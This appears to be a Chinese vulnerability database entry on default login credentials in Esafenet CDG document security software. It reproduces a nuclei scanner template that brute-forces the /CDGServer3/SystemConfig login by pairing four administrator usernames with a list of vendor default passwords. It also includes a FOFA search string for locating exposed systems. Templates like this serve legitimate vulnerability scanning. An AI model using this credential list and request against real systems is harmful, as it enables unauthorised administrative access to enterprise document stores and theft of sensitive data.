漏洞信息
漏洞名称: Esafenet CDG 默认登录凭证漏洞
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: Esafenet CDG是一款电子文档安全管理系统,广泛应用于企业环境中,用于保护和管理电子文档的安全。该系统默认存在一组已知的登录凭证,攻击者可以利用这些凭证未经授权访问系统。该漏洞的根源在于系统出厂时预设了默认的用户名和密码,且未强制要求用户在首次使用时修改这些凭证。这导致任何知道这些默认凭证的人都可以轻易登录系统,获取敏感信息或执行未授权操作。由于这些默认凭证是公开的,攻击者可以自动化工具批量尝试登录,从而对系统安全构成严重威胁。此漏洞不需要任何前置条件即可利用,且影响范围广泛,特别是那些未及时更改默认凭证的系统。
产品厂商: esafenet
产品名称: cdg
影响版本: *
搜索语法: esafenet
来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fdefault-logins%2Fesafenet-cdg-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61
| id: esafenet-cdg-default-login
info: name: Esafenet CDG - Default Login author: chesterblue severity: high description: | Esafenet electronic document security management system default credentials were discovered. classification: cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:* metadata: verified: true max-request: 32 vendor: esafenet product: cdg fofa-query: esafenet tags: esafenet,cdg,default-login
http: - method: POST path: - "{{BaseURL}}/CDGServer3/SystemConfig"
headers: content-type: application/x-www-form-urlencoded
body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}" attack: clusterbomb payloads: username: - "systemadmin" - "configadmin" - "secadmin" - "docadmin" password: - "Est@Spc820" - "12345678" - "123456" - "Est@Spc2018" - "Est@Spc2019" - "Est@Spc2020" - "Est@Spc2021" - "Est@Spc2022"
matchers-condition: and matchers: - type: word words: - "est.connection.url"
- type: regex part: body regex: - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"
- type: status status: - 200
|